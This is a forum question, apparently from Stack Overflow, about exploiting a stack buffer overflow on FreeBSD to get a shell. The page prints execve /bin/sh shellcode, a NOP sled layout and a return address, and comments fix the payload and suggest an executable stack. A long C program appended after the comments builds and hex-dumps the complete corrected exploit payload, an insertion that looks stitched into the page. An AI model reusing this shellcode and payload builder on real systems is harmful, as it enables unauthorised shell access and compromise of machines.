
So I am trying to implement a buffer overflow to get shell access to a buggy machine.

The machine is:

  • FreeBSD
  • little-endian byte order
  • a string length of 200, which causes the overflow

Now, after consulting http://shell-storm.org/shellcode/files/shellcode-106.php to get a shellcode for /bin/sh and modifying the string, this is what I made:

NO-Ops: "\x90"x164

SHELLCODE: "\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05";print

Address to jump to: "\x68\xea\xff\xff\xff\x7f";' # 0x7fffffffea68 is in the middle of the NOPs.

The problem is, I can get my EIP to point to 0x7fffffffea68 exactly. However, when the segmentation fault occurs, the address shows up as 0x00007fffffffae68. How do I navigate to the address 0x7fffffffea68 as it shows up, without the four zeros, when I look at the registers from the stack pointer? The address is correct, but I cannot jump there as it is "incorrect".

This is how the address shows up during the segmentation fault (ignore ea/ae here, the problem is the same both ways): [screenshot: how it appears on segmentation fault]

Here is the output of `info registers`: [screenshot: the instruction pointer to the address]

Here is how it appears in the dump (to show the intended address): [screenshot: w.r.t. stack pointers, giving the address to jump into]

I do not understand where I am going wrong with this. The likely answer is the address to jump to, so I tried making various changes to the lengths and to where I jump. It still does not work.

The second possibility could be the shellcode, but I put my money on the length. I need help understanding where I might be wrong and how I can go about mitigating this problem. Thanks.

  • 0x7fffffffae68 and 0x00007fffffffae68 are the very same numbers. It is quite common to suppress leading zeroes. – the busybee Jan 17 '22 at 10:10
  • The memory dump is at 0x7fffffffea68, not 0x7fffffffae68. – Ruud Helderman Jan 17 '22 at 10:21
  • Sorry, added the correction between ae and ea. ea is the correct one. The problem is the same regardless. – aika Jan 17 '22 at 10:29
  • "Invalid permission" could mean that you are not allowed to execute code from the data segment. A common virus protection feature. – BoP Jan 17 '22 at 11:27
  • Ohh. Makes sense. Let me try this with root. – aika Jan 17 '22 at 12:08
  • Did not work that way either, but let me try looking at the suggested problem. Thank you for the tip. – aika Jan 17 '22 at 12:16
  • There's a backslash missing in `"\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05";print`. This is not going to fly. – Ruud Helderman Jan 17 '22 at 14:00
  • Processes running as `root` don't have all their pages read+write+exec; that would be the absolute last thing you'd want, making them more vulnerable to code-injection attacks like this!! You probably need to build with `gcc -z execstack` to make the stack itself executable (previously that made all pages executable, but not anymore). See [How to get c code to execute hex machine code?](https://stackoverflow.com/q/9960721) for example, and [Exactly what cases does the gcc execstack flag allow and how does it enforce it?](https://stackoverflow.com/q/53346274) – Peter Cordes Jan 17 '22 at 15:47
  • Thank you @PeterCordes. Will try this path. – aika Jan 18 '22 at 09:51
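The layout the question describes (NOP sled, then shellcode, then a little-endian return address that must land inside the sled) and two of the points raised in the comments (the dropped backslash in the pasted shellcode, and the address printed with or without leading zeros being the same number) can all be checked on the attacker's side before anything is sent to the target. The C program below is an added example and is not the asker's script nor anything from shell-storm: it decodes a "\xNN" escape string and rejects a dropped backslash, confirms the shellcode contains no 0x00 byte (a strcpy-style copy would stop there), lays out a payload of the question's 200-byte length and packs the return address least-significant byte first. The return-address offset (192 bytes into the buffer) and the buffer's stack address used in the demo are assumptions for illustration; the real offset has to be measured on the target binary. The program only builds the payload and never executes it; running the shellcode on the target still needs an executable stack, as the comments discuss.

```c
/* Added example: host-side payload builder for the stack smash described in
 * the question.  Not the asker's script.  Layout produced:
 *   [NOP sled][shellcode][return address, little-endian][NUL padding]
 * Assumptions (not from the page): the target copies the string with a
 * strcpy-style routine, so no 0x00 may appear before the payload's end, and
 * the saved return address sits at a known offset from the buffer start. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The question's shellcode (shell-storm shellcode-106, FreeBSD x86-64
 * execve /bin/sh) with the backslash that a comment found missing restored. */
static const char QUESTION_SHELLCODE[] =
    "\\x48\\x31\\xc0\\x99\\xb0\\x3b\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f"
    "\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x48\\x89\\xe7\\x57\\x52\\x48\\x89"
    "\\xe6\\x0f\\x05";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode a "\xNN\xNN..." escape string into raw bytes.  Returns the byte
 * count, or -1 if anything other than a well-formed \xNN escape is found,
 * which is exactly what a dropped backslash ("\x08x57") looks like. */
int decode_hex_escapes(const char *s, uint8_t *out, size_t cap)
{
    size_t n = 0;
    while (*s) {
        if (s[0] != '\\' || s[1] != 'x') return -1;
        int hi = hexval((unsigned char)s[2]);
        if (hi < 0) return -1;
        int lo = hexval((unsigned char)s[3]);
        if (lo < 0) return -1;
        if (n >= cap) return -1;
        out[n++] = (uint8_t)((hi << 4) | lo);
        s += 4;
    }
    return (int)n;
}

/* Index of the first 0x00 byte in p, or -1.  A strcpy-style copy ends there,
 * so the shellcode must return -1 and the payload's first NUL should be the
 * one that naturally ends a canonical user-space address. */
int first_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return (int)i;
    return -1;
}

/* Fill buf[0..total) as: NOP sled, shellcode ending exactly at ret_off,
 * ret_addr as 8 little-endian bytes, then zeros.  Returns the sled length,
 * or -1 if the pieces do not fit. */
int build_payload(uint8_t *buf, size_t total, size_t ret_off,
                  const uint8_t *sc, size_t sc_len, uint64_t ret_addr)
{
    if (ret_off + 8 > total || sc_len > ret_off) return -1;
    size_t sled = ret_off - sc_len;
    memset(buf, 0x90, sled);                     /* nop */
    memcpy(buf + sled, sc, sc_len);
    for (int i = 0; i < 8; i++)                  /* least significant byte first */
        buf[ret_off + i] = (uint8_t)(ret_addr >> (8 * i));
    memset(buf + ret_off + 8, 0, total - ret_off - 8);
    return (int)sled;
}

/* True when ret_addr falls inside the sled, given where the overflowed buffer
 * starts on the target's stack (buf_addr).  Any such address slides into the
 * shellcode; an address outside the sled faults or executes garbage. */
int lands_in_sled(uint64_t buf_addr, size_t sled_len, uint64_t ret_addr)
{
    return ret_addr >= buf_addr && ret_addr < buf_addr + sled_len;
}

int main(void)
{
    uint8_t sc[64], payload[200];
    int sc_len = decode_hex_escapes(QUESTION_SHELLCODE, sc, sizeof sc);
    if (sc_len < 0 || first_nul(sc, (size_t)sc_len) >= 0) {
        fprintf(stderr, "shellcode string is malformed or contains NUL\n");
        return 1;
    }
    /* Assumed values for the demo: saved return address 192 bytes into the
     * buffer, buffer starting at 0x7fffffffea00 on the target's stack. */
    uint64_t target = 0x7fffffffea68ULL;
    int sled = build_payload(payload, sizeof payload, 192, sc, (size_t)sc_len, target);
    printf("shellcode %d bytes, sled %d bytes, lands in sled: %s\n", sc_len, sled,
           lands_in_sled(0x7fffffffea00ULL, (size_t)sled, target) ? "yes" : "no");
    for (size_t i = 0; i < sizeof payload; i++)  /* hex dump, 16 bytes per line */
        printf("%02x%c", payload[i], (i % 16 == 15) ? '\n' : ' ');
    putchar('\n');
    /* Printed with and without zero padding, the address is one number. */
    printf("%#llx == %#018llx\n", (unsigned long long)target, (unsigned long long)target);
    return 0;
}
```

The hex dump makes the question's two traps visible at once: the address bytes come out as 68 ea ff ff ff 7f 00 00, so the first NUL of a strcpy-style copy is the natural end of the address (which is why the question's 6-byte address works when the saved return's upper bytes are already zero), and any literal "x57" in the source string is rejected before it silently shifts every byte after it.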

0 Answers